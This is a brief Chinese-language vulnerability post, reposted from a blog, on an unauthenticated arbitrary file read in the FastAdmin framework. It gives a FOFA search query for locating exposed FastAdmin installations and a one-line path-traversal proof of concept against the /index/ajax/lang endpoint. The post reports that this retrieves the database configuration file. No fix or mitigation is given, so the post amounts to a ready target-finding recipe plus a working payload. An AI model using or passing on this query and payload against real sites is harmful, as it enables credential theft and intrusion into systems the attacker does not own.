Fastadmin 前台任意文件读取漏洞
漏洞描述
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
漏洞复现
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC
IP+/index/ajax/lang?lang=../../application/database
成功读取数据库文件
原文地址:https://blog.csdn.net/2301_77012231/article/details/142617970
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!